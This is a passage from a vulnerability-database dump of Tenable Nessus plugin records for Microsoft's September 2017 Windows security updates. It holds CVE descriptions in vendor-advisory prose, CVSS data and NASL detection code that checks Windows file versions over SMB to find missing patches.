update\n addresses the vulnerability by correcting the way in\n which the Windows Graphics Component handles objects in\n memory. (CVE-2017-8683)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. Users whose accounts are\n configured to have fewer user rights on the system could\n be less impacted than users who operate with\n administrative user rights. There are multiple ways an\n attacker could exploit this vulnerability. In a web-\n based attack scenario, an attacker could host a\n specially crafted website that is designed to exploit\n this vulnerability and then convince a user to view the\n website. An attacker would have no way to force users to\n view the attacker-controlled content. Instead, an\n attacker would have to convince users to take action,\n typically by getting them to click a link in an email\n message or in an Instant Messenger message that takes\n users to the attacker's website, or by opening an\n attachment sent through email. In a file sharing attack\n scenario, an attacker could provide a specially crafted\n document file that is designed to exploit this\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerabilities by correcting how the Windows font\n library handles embedded fonts. (CVE-2017-8682)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user. If the current user is logged on with\n administrative user rights, an attacker could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. To exploit the\n vulnerability, a user must open a specially crafted\n file. In an email attack scenario, an attacker could\n exploit the vulnerability by sending the specially\n crafted file to the user and then convincing the user to\n open the file. In a web-based attack scenario, an\n attacker could host a website (or leverage a compromised\n website that accepts or hosts user-provided content)\n that contains a specially crafted file designed to\n exploit the vulnerability. An attacker would have no way\n to force a user to visit the website. Instead, an\n attacker would have to convince a user to click a link,\n typically by way of an enticement in an email or Instant\n Messenger message, and then convince the user to open\n the specially crafted file. The security update\n addresses the vulnerability by helping to ensure that\n Windows Shell validates file copy destinations.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. To exploit this vulnerability, an attacker\n would have to log on to an affected system and run a\n specially crafted application. The security update\n addresses the vulnerability by correcting how the\n Windows kernel handles memory addresses. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. To exploit this vulnerability, an\n attacker would first have to log on to the system. An\n attacker could then run a specially crafted application\n that could exploit the vulnerability and take control of\n an affected system. The update addresses this\n vulnerability by correcting how Win32k handles objects\n in memory. (CVE-2017-8720)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. To exploit this\n vulnerability, an attacker would have to log on to an\n affected system and run a specially crafted application.\n The vulnerability would not allow an attacker to execute\n code or to elevate user rights directly, but it could be\n used to obtain information that could be used to try to\n further compromise the affected system. The security\n update addresses the vulnerability by correcting how the\n Windows GDI+ component handles objects in memory.\n (CVE-2017-8680, CVE-2017-8681, CVE-2017-8684,\n CVE-2017-8685)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights. There are\n multiple ways an attacker could exploit this\n vulnerability: In a web-based attack scenario, an\n attacker could host a specially crafted website designed\n to exploit this vulnerability and then convince a user\n to view the website. An attacker would have no way to\n force users to view the attacker-controlled content.\n Instead, an attacker would have to convince users to\n take action, typically by getting them to click a link\n in an email or instant message that takes users to the\n attacker's website, or by opening an attachment sent\n through email. In a file-sharing attack scenario, an\n attacker could provide a specially crafted document file\n designed to exploit this vulnerability and then convince\n a user to open the document file.The security update\n addresses the vulnerability by correcting how Windows\n Uniscribe handles objects in memory. (CVE-2017-8696)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. To exploit this vulnerability, an\n attacker would have to log on to an affected system and\n run a specially crafted application. The security update\n addresses the vulnerability by correcting how GDI+\n handles memory addresses. (CVE-2017-8688)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. To exploit\n this vulnerability, an attacker would first have to log\n on to the system. An attacker could then run a specially\n crafted application that could exploit the vulnerability\n and take control of an affected system. The update\n addresses this vulnerability by correcting how the\n Windows kernel-mode driver handles objects in memory.\n (CVE-2017-8675)\n\n - A spoofing vulnerability exists in Microsoft's\n implementation of the Bluetooth stack. An attacker who\n successfully exploited this vulnerability could perform\n a man-in-the-middle attack and force a user's computer\n to unknowingly route traffic through the attacker's\n computer. The attacker can then monitor and read the\n traffic before sending it on to the intended recipient.\n To exploit the vulnerability, the attacker needs to be\n within the physical proximity of the targeted user, and\n the user's computer needs to have Bluetooth enabled. The\n attacker can then initiate a Bluetooth connection to the\n target computer without the user's knowledge. The\n security update addresses the vulnerability by\n correcting how Windows handles Bluetooth requests.\n (CVE-2017-8628)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. To exploit this vulnerability, an attacker would\n have to log on to an affected system and run a specially\n crafted application. The vulnerability would not allow\n an attacker to execute code or to elevate user rights\n directly, but it could be used to obtain information\n that could be used to try to further compromise the\n affected system. The update addresses the vulnerability\n by correcting how the Windows kernel handles objects in\n memory. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. To exploit this vulnerability, an\n attacker would have to log on to an affected system and\n run a specially crafted application. Note that where the\n severity is indicated as Critical in the Affected\n Products table, the Preview Pane is an attack vector for\n this vulnerability. The security update addresses the\n vulnerability by correcting how GDI handles memory\n addresses. (CVE-2017-8676)\");\n # https://support.microsoft.com/en-us/help/4032201/windows-kernel-information-disclosure-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b4cfaff8\");\n # https://support.microsoft.com/en-us/help/4034786/bluetooth-driver-spoofing-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7a43fdc7\");\n # https://support.microsoft.com/en-us/help/4038874/windows-kernel-information-disclosure-vulnerability-in-windows-server\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7c6e0c59\");\n # https://support.microsoft.com/en-us/help/4039038/information-disclosure-vulnerability-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?28782454\");\n # https://support.microsoft.com/en-us/help/4039266/windows-shell-remote-code-execution-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a2d3ffe7\");\n # https://support.microsoft.com/en-us/help/4039325/hyper-v-information-disclosure-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?09206238\");\n # https://support.microsoft.com/en-us/help/4039384/windows-uniscribe-vulnerabilities\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4d820c79\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the following security updates :\n\n - KB4032201\n - KB4034786\n - KB4038874\n - KB4039038\n - KB4039266\n - KB4039325\n - KB4039384\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-08';\n\nkbs = make_list(\n \"4032201\",\n \"4034786\",\n \"4038874\",\n \"4039038\",\n \"4039266\",\n \"4039325\",\n \"4039384\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KBs only apply to Windows 2008\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\n# 4032201\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"-usermodensi_31bf3856ad364e35\", file_pat:\"^nsisvc\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19858','6.0.6002.24180'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4032201\", session:the_session);\n\n# 4034786 ; cannot locate on disk yet\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"bthpan.inf_31bf3856ad364e35\", file_pat:\"^bthpan\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19848','6.0.6002.24169'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4034786\", session:the_session);\n\n# 4038874\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"ntdll_31bf3856ad364e35\", file_pat:\"^ntdll\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19623','6.0.6002.24180'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4038874\", session:the_session);\n\n# 4039038\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"m..-management-console_31bf3856ad364e35\", file_pat:\"^mmc\\.exe$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19858', '6.0.6002.24180'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4039038\", session:the_session);\n\n# 4039266\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"shell32_31bf3856ad364e35\", file_pat:\"^shell32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19861', '6.0.6002.24182'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4039266\", session:the_session);\n\n# 4039325 ; x64 only ; hyper-v\n#arch = get_kb_item_or_exit('SMB/ARCH');\n#if (arch == \"x64\")\n#{\n# files = list_dir(basedir:winsxs, level:0, dir_pat:\"vstack-vmwp_31bf3856ad364e35\", file_pat:\"^vmwp\\.exe$\", max_recurse:1);\n# vuln += hotfix_check_winsxs(os:'6.0',\n# sp:2,\n# files:files,\n# versions:make_list('6.0.6002.19858', '6.0.6002.24180'),\n# max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n# bulletin:bulletin,\n# kb:\"4039325\", session:the_session);\n#}\n\n# 4039384\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"win32k_31bf3856ad364e35\", file_pat:\"^win32k\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19836', '6.0.6002.24154'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4039384\", session:the_session);\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:59", "description": "The remote Windows host is missing security update 4038786\nor cumulative update 4038799. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. \n (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681,\n CVE-2017-8684)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive. To\n exploit the vulnerability, an attacker could send a\n specially crafted packet to a DHCP server. However, the\n DHCP server must be set to failover mode for the attack\n to succeed. The security update addresses the\n vulnerability by correcting how DHCP failover servers\n handle network packets. (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system. To\n exploit the vulnerability, an attacker could issue a\n specially crafted certificate on the guest operating\n system that could cause the VM host agent service on the\n host operating system to execute arbitrary code. The\n Remote Desktop Virtual Host role is not enabled by\n default. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on the host\n operating system. The security update addresses the\n vulnerability by correcting how VM host agent service\n validates guest operating system user input.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, CVE-2017-8709,\n CVE-2017-8719)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8720)\n\n - A spoofing vulnerability exists when Internet Explorer\n improperly handles specific HTML content. An attacker\n who successfully exploited this vulnerability could\n trick a user into believing that the user was visiting a\n legitimate website. The specially crafted website could\n either spoof content or serve as a pivot to chain an\n attack with other vulnerabilities in web services. To\n exploit the vulnerability, the user must either browse\n to a malicious website or be redirected to it. In an\n email attack scenario, an attacker could send an email\n message in an attempt to convince the user to click a\n link to the malicious website. (CVE-2017-8733)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows PDF Library improperly handles objects\n in memory. The vulnerability could corrupt memory in a\n way that enables an attacker to execute arbitrary code\n in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. \n (CVE-2017-8728, CVE-2017-8737)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browser JavaScript engines render content\n when handling objects in memory. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. (CVE-2017-8741)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. (CVE-2017-8747,\n CVE-2017-8749)\n\n - A remote code execution vulnerability exists when\n Microsoft .NET Framework processes untrusted input. An\n attacker who successfully exploited this vulnerability\n in software using the .NET framework could take control\n of an affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8759)\n \n - An information disclosure vulnerability exists in\n Microsoft browsers in the scripting engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to disclose files on a user's computer. (CVE-2017-8529)", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-09-12T00:00:00", "title": "Windows Server 2012 September 2017 Security Updates", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8681", "CVE-2017-8713", "CVE-2017-8741", "CVE-2017-8695", "CVE-2017-8682", "CVE-2017-8684", "CVE-2017-0161", "CVE-2017-8719", "CVE-2017-8737", "CVE-2017-8699", "CVE-2017-8749", "CVE-2017-8709", "CVE-2017-8683", "CVE-2017-8680", "CVE-2017-8678", "CVE-2017-8714", "CVE-2017-8728", "CVE-2017-8686", "CVE-2017-8677", "CVE-2017-8747", "CVE-2017-8679", "CVE-2017-8687", "CVE-2017-8759", "CVE-2017-8676", "CVE-2017-8708", "CVE-2017-8688", "CVE-2017-8720", "CVE-2017-8692", "CVE-2017-8529", "CVE-2017-8733", "CVE-2017-8675"], "modified": "2017-09-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_SEP_4038799.NASL", "href": "https://www.tenable.com/plugins/nessus/103132", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103132);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/28\");\n\n script_cve_id(\n \"CVE-2017-0161\",\n \"CVE-2017-8529\",\n \"CVE-2017-8675\",\n \"CVE-2017-8676\",\n \"CVE-2017-8677\",\n \"CVE-2017-8678\",\n \"CVE-2017-8679\",\n \"CVE-2017-8680\",\n \"CVE-2017-8681\",\n \"CVE-2017-8682\",\n \"CVE-2017-8683\",\n \"CVE-2017-8684\",\n \"CVE-2017-8686\",\n \"CVE-2017-8687\",\n \"CVE-2017-8688\",\n \"CVE-2017-8692\",\n \"CVE-2017-8695\",\n \"CVE-2017-8699\",\n \"CVE-2017-8708\",\n \"CVE-2017-8709\",\n \"CVE-2017-8713\",\n \"CVE-2017-8714\",\n \"CVE-2017-8719\",\n \"CVE-2017-8720\",\n \"CVE-2017-8728\",\n \"CVE-2017-8733\",\n \"CVE-2017-8737\",\n \"CVE-2017-8741\",\n \"CVE-2017-8747\",\n \"CVE-2017-8749\",\n \"CVE-2017-8759\"\n );\n script_xref(name:\"MSKB\", value:\"4038786\");\n script_xref(name:\"MSFT\", value:\"MS17-4038786\");\n script_xref(name:\"MSKB\", value:\"4038799\");\n script_xref(name:\"MSFT\", value:\"MS17-4038799\");\n\n script_name(english:\"Windows Server 2012 September 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4038786\nor cumulative update 4038799. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A race condition that could lead to a remote code\n execution vulnerability exists in NetBT Session Services\n when NetBT fails to maintain certain sequencing\n requirements. (CVE-2017-0161)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-8675)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8676)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-8682)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-8683)\n\n - A information disclosure vulnerability exists when the\n Windows GDI+ component improperly discloses kernel\n memory addresses. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. \n (CVE-2017-8677, CVE-2017-8680, CVE-2017-8681,\n CVE-2017-8684)\n\n - A memory corruption vulnerability exists in the Windows\n Server DHCP service when an attacker sends specially\n crafted packets to a DHCP failover server. An attacker\n who successfully exploited the vulnerability could\n either run arbitrary code on the DHCP failover server or\n cause the DHCP service to become nonresponsive. To\n exploit the vulnerability, an attacker could send a\n specially crafted packet to a DHCP server. However, the\n DHCP server must be set to failover mode for the attack\n to succeed. The security update addresses the\n vulnerability by correcting how DHCP failover servers\n handle network packets. (CVE-2017-8686)\n\n - An Information disclosure vulnerability exists in\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-8687)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-8688)\n\n - A remote code execution vulnerability exists due to the\n way Windows Uniscribe handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-8692)\n\n - An information disclosure vulnerability exists when\n Windows Uniscribe improperly discloses the contents of\n its memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n Windows Uniscribe handles objects in memory.\n (CVE-2017-8695)\n\n - A remote code execution vulnerability exists when\n Windows Shell does not properly validate file copy\n destinations. An attacker who successfully exploited the\n vulnerability could run arbitrary code in the context of\n the current user.\n (CVE-2017-8699)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address, allowing an attacker to retrieve information\n that could lead to a Kernel Address Space Layout\n Randomization (KASLR) bypass. An attacker who\n successfully exploited this vulnerability could retrieve\n the base address of the kernel driver from a compromised\n process. (CVE-2017-8708)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2017-8713)\n\n - A remote code execution vulnerability exists in the VM\n Host Agent Service of Remote Desktop Virtual Host role\n when it fails to properly validate input from an\n authenticated user on a guest operating system. To\n exploit the vulnerability, an attacker could issue a\n specially crafted certificate on the guest operating\n system that could cause the VM host agent service on the\n host operating system to execute arbitrary code. The\n Remote Desktop Virtual Host role is not enabled by\n default. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on the host\n operating system. The security update addresses the\n vulnerability by correcting how VM host agent service\n validates guest operating system user input.\n (CVE-2017-8714)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-8678, CVE-2017-8679, 